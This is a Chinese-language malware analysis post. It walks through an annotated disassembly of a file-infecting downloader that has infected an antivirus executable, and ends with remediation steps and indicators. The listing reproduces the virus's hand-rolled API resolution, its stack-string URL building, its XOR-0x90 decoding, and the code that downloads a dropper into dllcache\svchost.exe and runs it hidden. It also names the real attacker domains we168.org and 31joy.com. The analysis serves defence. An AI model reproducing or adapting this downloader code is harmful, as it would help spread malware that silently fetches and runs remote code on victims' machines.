应凝逸的求助，我简单看了一下他说的那个“加密了入口点”的感染型病毒样本。下载样本后发现，它其实就是凝逸那款杀毒软件的主程序（已被感染）。
00607441 > E8 00000000 call nyfd.00607446 ; infected entry point (OllyDbg stops here); call $+5 / pop ebp = classic get-own-address delta
00607446 5D pop ebp ; ebp = 00607446 (runtime address of this instruction)
00607447 81ED 46746000 sub ebp,nyfd.00607446 ; ebp = relocation delta (0 when loaded at the preferred base); not used again below
0060744D 8B0424 mov eax,dword ptr ss:[esp] ; [esp] is the return address into the loader code (kernel32) that called the entry point
00607450 25 0000FFFF and eax,FFFF0000 ; round down to a 64K allocation boundary
00607455 8138 4D5A9000 cmp dword ptr ds:[eax],905A4D ; bytes 4D 5A 90 00 = "MZ\x90\0": stricter than just "MZ", also requires e_cblp == 0x90 (true of the stock linker DOS stub)
0060745B 74 07 je short nyfd.00607464 ; hit -> eax = kernel32 image base (OllyDbg shows 7C800000 when it is pushed at 006075D6)
0060745D 2D 00100000 sub eax,1000 ; otherwise step back one page and retry
00607462 ^ EB F1 jmp short nyfd.00607455 ; NOTE: no lower bound and no IsBadReadPtr-style guard; an unmapped page would fault. Relies on the XP-era loader calling the entry point from inside kernel32
00607464 55 push ebp
00607465 53 push ebx
00607466 56 push esi
00607467 57 push edi ; save regs (ebp is about to be reused as the kernel32 base)
00607468 8BE8 mov ebp,eax ; ebp = kernel32 image base for the rest of the stub
0060746A 0340 3C add eax,dword ptr ds:[eax+3C] ; eax = base + e_lfanew -> IMAGE_NT_HEADERS
0060746D 8B78 78 mov edi,dword ptr ds:[eax+78] ; NT+0x78 = DataDirectory[EXPORT].VirtualAddress
00607470 03FD add edi,ebp ; edi -> IMAGE_EXPORT_DIRECTORY
00607472 8B77 20 mov esi,dword ptr ds:[edi+20] ; +0x20 AddressOfNames (RVA)
00607475 03F5 add esi,ebp ; esi -> table of name RVAs
00607477 33D2 xor edx,edx ; edx = name index
00607479 8B06 mov eax,dword ptr ds:[esi] ; RVA of the edx-th export name
0060747B 03C5 add eax,ebp ; eax -> ASCII name
0060747D 8138 47657450 cmp dword ptr ds:[eax],50746547 ; "GetP"
00607483 75 32 jnz short nyfd.006074B7
00607485 8178 04 726F6341 cmp dword ptr ds:[eax+4],41636F72 ; "rocA"
0060748C 75 29 jnz short nyfd.006074B7
0060748E 8178 08 64647265 cmp dword ptr ds:[eax+8],65726464 ; "ddre"
00607495 75 20 jnz short nyfd.006074B7
00607497 66:8178 0C 7373 cmp word ptr ds:[eax+C],7373 ; "ss" -> name begins with "GetProcAddress" (the terminator is not checked)
0060749D 75 18 jnz short nyfd.006074B7
0060749F 8B47 24 mov eax,dword ptr ds:[edi+24] ; +0x24 AddressOfNameOrdinals
006074A2 03C5 add eax,ebp
006074A4 0FB71C50 movzx ebx,word ptr ds:[eax+edx*2] ; ebx = ordinal for this name
006074A8 8B47 1C mov eax,dword ptr ds:[edi+1C] ; +0x1C AddressOfFunctions
006074AB 03C5 add eax,ebp
006074AD 8B0498 mov eax,dword ptr ds:[eax+ebx*4] ; function RVA
006074B0 03C5 add eax,ebp ; eax = &kernel32!GetProcAddress
006074B2 A3 2B706000 mov dword ptr ds:[60702B],eax ; cache it: every later `call dword ptr [60702B]` is GetProcAddress
006074B7 83C6 04 add esi,4 ; next name RVA
006074BA 42 inc edx
006074BB 3B57 18 cmp edx,dword ptr ds:[edi+18] ; +0x18 NumberOfNames
006074BE ^ 75 B9 jnz short nyfd.00607479 ; walks the whole export name table (no early exit after the hit). This is manual import resolution: the infection adds nothing to the host's IAT, so an import-table diff will not show the new APIs
006074C0 68 77706000 push nyfd.00607077 ; lpProcName = "FreeLibrary"
006074C5 55 push ebp ; hModule = kernel32 base
006074C6 FF15 2B706000 call dword ptr ds:[60702B] ; GetProcAddress
006074CC A3 33706000 mov dword ptr ds:[607033],eax ; [607033] = FreeLibrary
006074D1 68 83706000 push nyfd.00607083 ; lpProcName = "ExitProcess"
006074D6 55 push ebp
..................................... ; [elided in this listing: the remaining kernel32 imports used by the payload (GetSystemDirectoryA, lstrcatA, lstrcmpiA, CreateFileA, ReadFile, CloseHandle, CopyFileA, DeleteFileA, WinExec) and the routine stored at [60702F] are resolved here and stored in the 6070xx slots]
0060758C 68 63706000 push nyfd.00607063 ; "urlmon"
00607591 FF15 2F706000 call dword ptr ds:[60702F] ; one string argument, result kept as a module handle -- presumably LoadLibraryA (resolved in the elided part); confirm in the debugger
00607597 A3 23706000 mov dword ptr ds:[607023],eax ; [607023] = urlmon module handle
0060759C 52 push edx ; save edx around the call (restored at 006075B0)
0060759D 8D15 AC706000 lea edx,dword ptr ds:[6070AC] ; lpProcName -> presumably "URLDownloadToFileA", judging by what the result is used for below
006075A3 52 push edx
006075B1 A3 5B706000 mov dword ptr ds:[60705B],eax ; urlmon.URLDownloadToFileA ; NOTE(listing): this line is a misplaced duplicate of 006075B1 below. The 6 bytes really at 006075A4-006075A9 are missing from the paste; that size fits `push dword ptr ds:[607023]` (hModule = urlmon), which GetProcAddress needs here -- verify in the debugger
006075AA FF15 2B706000 call dword ptr ds:[60702B] ; GetProcAddress
006075B0 5A pop edx
006075B1 A3 5B706000 mov dword ptr ds:[60705B],eax ; [60705B] = urlmon!URLDownloadToFileA
006075B6 E8 1B000000 call nyfd.006075D6 ; run the downloader payload (006075D6) synchronously before the host gets control; URLDownloadToFileA blocks, so the host's start-up is delayed by the network round trip
006075BB A1 00706000 mov eax,dword ptr ds:[607000] ; [607000] holds the host's original entry point (OEP) in plaintext -- nothing is "encrypted"
006075C0 FFE0 jmp eax ; hand over to the real program. As far as this listing shows the host code is untouched, so a clean-up patch only needs AddressOfEntryPoint := [607000]
006075D6 55 push ebp ; kernel32.7C800000 ; ---- downloader payload sub_6075D6(): no arguments, called once from the entry stub. Fetches an XOR-0x90-encoded pointer file, downloads the URL it names into dllcache\svchost.exe and runs it ----
006075D7 8BEC mov ebp,esp
006075D9 81C4 38FDFFFF add esp,-2C8 ; 0x2C8 bytes of locals: [ebp-C8] URL string, [ebp-258] a.txt buffer (100 B), [ebp-2BC] system.log buffer (100 B), [ebp-2C8]/[ebp-2C4] bytes-read counters, [ebp-2C0] file handle
006075DF C785 38FFFFFF 68740000 mov dword ptr ss:[ebp-C8],7468 ; stack string, 2 chars per store (each dword store also zeroes the following 2 bytes, which the next store overwrites) -- presumably to keep the URL out of a plain `strings` scan: "ht"
006075E9 C785 3AFFFFFF 74700000 mov dword ptr ss:[ebp-C6],7074 ; "tp"
006075F3 C785 3CFFFFFF 3A2F0000 mov dword ptr ss:[ebp-C4],2F3A ; ":/"
006075FD C785 3EFFFFFF 2F770000 mov dword ptr ss:[ebp-C2],772F ; "/w"
00607607 C785 40FFFFFF 77770000 mov dword ptr ss:[ebp-C0],7777 ; "ww"
00607611 C785 42FFFFFF 2E770000 mov dword ptr ss:[ebp-BE],772E ; ".w"
0060761B C785 44FFFFFF 65310000 mov dword ptr ss:[ebp-BC],3165 ; "e1"
00607625 C785 46FFFFFF 36380000 mov dword ptr ss:[ebp-BA],3836 ; "68"
0060762F C785 48FFFFFF 2E6F0000 mov dword ptr ss:[ebp-B8],6F2E ; ".o"
00607639 C785 4AFFFFFF 72670000 mov dword ptr ss:[ebp-B6],6772 ; "rg"
00607643 C785 4CFFFFFF 2F440000 mov dword ptr ss:[ebp-B4],442F ; "/D"
0060764D C785 4EFFFFFF 61740000 mov dword ptr ss:[ebp-B2],7461 ; "at"
00607657 C785 50FFFFFF 612F0000 mov dword ptr ss:[ebp-B0],2F61 ; "a/"
00607661 C785 52FFFFFF 612E0000 mov dword ptr ss:[ebp-AE],2E61 ; "a."
0060766B C785 54FFFFFF 74780000 mov dword ptr ss:[ebp-AC],7874 ; "tx"
00607675 C685 56FFFFFF 74 mov byte ptr ss:[ebp-AA],74 ; "t"
0060767C C685 57FFFFFF 00 mov byte ptr ss:[ebp-A9],0 ; NUL -> [ebp-C8] = "http://www.we168.org/Data/a.txt" (C2 pointer file; network IOC)
00607683 68 04010000 push 104 ; uSize = MAX_PATH
00607688 68 35716000 push nyfd.00607135 ; lpBuffer = global path buffer #1
0060768D FF15 57706000 call dword ptr ds:[607057] ; kernel32.GetSystemDirectoryA -> <system32>; writing there needs admin rights on a pre-Vista box, which the 2000/XP-era target usually had
00607693 68 1D716000 push nyfd.0060711D ; "\system.bak"
00607698 68 35716000 push nyfd.00607135
0060769D FF15 3B706000 call dword ptr ds:[60703B] ; kernel32.lstrcatA -> "<system32>\system.bak" (drop-file IOC #1; no bound check on the global buffer)
006076A3 8D9D 38FFFFFF lea ebx,dword ptr ss:[ebp-C8] ; ebx = URL
006076A9 6A 00 push 0 ; lpfnCB = NULL
006076AB 6A 00 push 0 ; dwReserved = 0
006076AD 68 35716000 push nyfd.00607135 ; szFileName = <system32>\system.bak
006076B2 53 push ebx ; szURL = http://www.we168.org/Data/a.txt
006076B3 6A 00 push 0 ; pCaller = NULL
006076B5 FF15 5B706000 call dword ptr ds:[60705B] ; urlmon.URLDownloadToFileA -- fetch the pointer file over plain HTTP; HRESULT is ignored
006076BB 6A 00 push 0 ; hTemplateFile
006076BD 68 80000000 push 80 ; FILE_ATTRIBUTE_NORMAL
006076C2 6A 03 push 3 ; OPEN_EXISTING
006076C4 6A 00 push 0 ; lpSecurityAttributes
006076C6 6A 01 push 1 ; FILE_SHARE_READ
006076C8 68 00000080 push 80000000 ; GENERIC_READ
006076CD 68 35716000 push nyfd.00607135 ; <system32>\system.bak
006076D2 FF15 43706000 call dword ptr ds:[607043] ; kernel32.CreateFileA
006076D8 83F8 FF cmp eax,-1 ; INVALID_HANDLE_VALUE: download failed / file absent
006076DB 75 05 jnz short nyfd.006076E2
006076DD E9 67010000 jmp nyfd.00607849 ; -> give up silently; the host then starts normally (offline machines show no symptom)
006076E2 8985 40FDFFFF mov dword ptr ss:[ebp-2C0],eax ; hFile
006076E8 8D95 A8FDFFFF lea edx,dword ptr ss:[ebp-258] ; lpBuffer = a.txt contents
006076EE 8D8D 38FDFFFF lea ecx,dword ptr ss:[ebp-2C8] ; lpNumberOfBytesRead
006076F4 6A 00 push 0 ; lpOverlapped
006076F6 51 push ecx
006076F7 6A 64 push 64 ; nNumberOfBytesToRead = 100
006076F9 52 push edx
006076FA FFB5 40FDFFFF push dword ptr ss:[ebp-2C0]
00607700 FF15 47706000 call dword ptr ds:[607047] ; kernel32.ReadFile (return value not checked)
00607706 FFB5 40FDFFFF push dword ptr ss:[ebp-2C0]
0060770C FF15 4B706000 call dword ptr ds:[60704B] ; kernel32.CloseHandle
00607712 8B8D 38FDFFFF mov ecx,dword ptr ss:[ebp-2C8] ; ecx = bytes read (<= 100)
00607718 36:C68429 A8FDFFFF 00 mov byte ptr ss:[ecx+ebp-258],0 ; NUL-terminate the buffer
00607721 8B8D 38FDFFFF mov ecx,dword ptr ss:[ebp-2C8]
00607727 36:81B429 A7FDFFFF 90000>xor dword ptr ss:[ecx+ebp-259],90 ; buf[ecx-1] ^= 0x90 (dword op, but the immediate only touches the low byte)
00607733 ^ E2 F2 loopd short nyfd.00607727 ; decode a.txt in place with the single-byte XOR key 0x90 -> URL of the real dropper. NOTE: with 0 bytes read, loopd first decrements ecx to FFFFFFFF and then runs downwards through the stack until it faults -- an empty a.txt crashes the host process
00607735 68 04010000 push 104
0060773A 68 39726000 push nyfd.00607239 ; global path buffer #2
0060773F FF15 57706000 call dword ptr ds:[607057] ; kernel32.GetSystemDirectoryA
00607745 68 29716000 push nyfd.00607129 ; "\system.log"
0060774A 68 39726000 push nyfd.00607239
0060774F FF15 3B706000 call dword ptr ds:[60703B] ; kernel32.lstrcatA -> "<system32>\system.log": copy of the previously processed a.txt (written by CopyFileA at 00607836; drop-file IOC #2)
00607755 6A 00 push 0
00607757 68 80000000 push 80
0060775C 6A 03 push 3
0060775E 6A 00 push 0
00607760 6A 01 push 1
00607762 68 00000080 push 80000000
00607767 68 39726000 push nyfd.00607239
0060776C FF15 43706000 call dword ptr ds:[607043] ; kernel32.CreateFileA (same flags as above)
00607772 83F8 FF cmp eax,-1
00607775 75 02 jnz short nyfd.00607779
00607777 EB 68 jmp short nyfd.006077E1 ; no system.log yet (first run) -> skip the comparison and download unconditionally
00607779 8985 40FDFFFF mov dword ptr ss:[ebp-2C0],eax
0060777F 8D95 44FDFFFF lea edx,dword ptr ss:[ebp-2BC] ; lpBuffer = system.log contents
00607785 8D8D 3CFDFFFF lea ecx,dword ptr ss:[ebp-2C4] ; lpNumberOfBytesRead
0060778B 6A 00 push 0
0060778D 51 push ecx
0060778E 6A 64 push 64
00607790 52 push edx
00607791 FFB5 40FDFFFF push dword ptr ss:[ebp-2C0]
00607797 FF15 47706000 call dword ptr ds:[607047] ; kernel32.ReadFile
0060779D FFB5 40FDFFFF push dword ptr ss:[ebp-2C0]
006077A3 FF15 4B706000 call dword ptr ds:[60704B] ; kernel32.CloseHandle
006077A9 8B8D 3CFDFFFF mov ecx,dword ptr ss:[ebp-2C4]
006077AF 36:C68429 44FDFFFF 00 mov byte ptr ss:[ecx+ebp-2BC],0
006077B8 8B8D 3CFDFFFF mov ecx,dword ptr ss:[ebp-2C4]
006077BE 36:80B429 43FDFFFF 90 xor byte ptr ss:[ecx+ebp-2BD],90
006077C7 ^ E2 F5 loopd short nyfd.006077BE ; same XOR-0x90 decode (byte form this time; same zero-length hazard). Original analyst's note: a.txt decoded to http://isa.31joy.coM/Images/Hide/m1.exE, which was already unreachable when analysed; the guess that it lands in dllcache\svchost.exe and is executed is confirmed at 006077F1-00607820
006077C9 8D95 A8FDFFFF lea edx,dword ptr ss:[ebp-258] ; decoded a.txt (new URL)
006077CF 8D8D 44FDFFFF lea ecx,dword ptr ss:[ebp-2BC] ; decoded system.log (last-seen URL)
006077D5 51 push ecx
006077D6 52 push edx
006077D7 FF15 3F706000 call dword ptr ds:[60703F] ; kernel32.lstrcmpiA: case-insensitive compare of new vs. last-seen URL
006077DD 0BC0 or eax,eax
006077DF 74 68 je short nyfd.00607849 ; unchanged -> already fetched, exit. The dropper is re-downloaded only when the operator changes the URL in a.txt
006077E1 68 04010000 push 104
006077E6 68 3D736000 push nyfd.0060733D ; global path buffer #3
006077EB FF15 57706000 call dword ptr ds:[607057] ; kernel32.GetSystemDirectoryA
006077F1 68 07716000 push nyfd.00607107 ; "\dllcache\svchost.exe" -- the Windows File Protection cache directory; drop-file IOC #3, and a svchost.exe there whose hash differs from the real one is the tell
006077F6 68 3D736000 push nyfd.0060733D
006077FB FF15 3B706000 call dword ptr ds:[60703B] ; kernel32.lstrcatA
00607801 8D9D A8FDFFFF lea ebx,dword ptr ss:[ebp-258] ; szURL = decoded a.txt
00607807 6A 00 push 0
00607809 6A 00 push 0
0060780B 68 3D736000 push nyfd.0060733D ; szFileName = <system32>\dllcache\svchost.exe
00607810 53 push ebx
00607811 6A 00 push 0
00607813 FF15 5B706000 call dword ptr ds:[60705B] ; urlmon.URLDownloadToFileA -- the dropper itself, over plain HTTP; no integrity or signature check between download and execution, and the HRESULT is ignored
00607819 6A 00 push 0 ; uCmdShow = 0 = SW_HIDE
0060781B 68 3D736000 push nyfd.0060733D
00607820 FF15 5F706000 call dword ptr ds:[60705F] ; kernel32.WinExec -- runs whatever was fetched, hidden; return value ignored
00607826 6A 00 push 0 ; bFailIfExists = FALSE
00607828 8D15 39726000 lea edx,dword ptr ds:[607239]
0060782E 52 push edx ; lpNewFileName = <system32>\system.log
0060782F 8D15 35716000 lea edx,dword ptr ds:[607135]
00607835 52 push edx ; lpExistingFileName = <system32>\system.bak
00607836 FF15 4F706000 call dword ptr ds:[60704F] ; kernel32.CopyFileA: remember this a.txt as "last seen"
0060783C 8D15 35716000 lea edx,dword ptr ds:[607135]
00607842 52 push edx
00607843 FF15 53706000 call dword ptr ds:[607053] ; kernel32.DeleteFileA: remove system.bak. system.log is left behind -- a persistent, XOR-0x90-encoded copy of the last C2 pointer file, handy for forensics (xor each byte with 0x90 to recover the URL)
00607849 C9 leave ; common exit for every failure path
0060784A C3 retn
由于没有拿到病毒母体，无法跟踪它是如何捆绑/感染宿主程序的；但可以肯定的是该病毒并没有加密入口点，只是把原程序的入口点（OEP）明文保存在 607000 处，病毒入口代码在 006075BB 处读出后直接 jmp 过去。目前的临时处理办法：从 607000 读出原程序入口点，把 PE 头中的 AddressOfEntryPoint 改回该值，使病毒体不再执行。需要注意这只是绕过而不是清除——附加在文件里的病毒代码和字符串仍然存在；另外受感染机器上还应检查并清理 system32 目录下的 system.bak、system.log 和 dllcache\svchost.exe，并在网络侧封堵 www.we168.org（a.txt）与 isa.31joy.com（m1.exe）。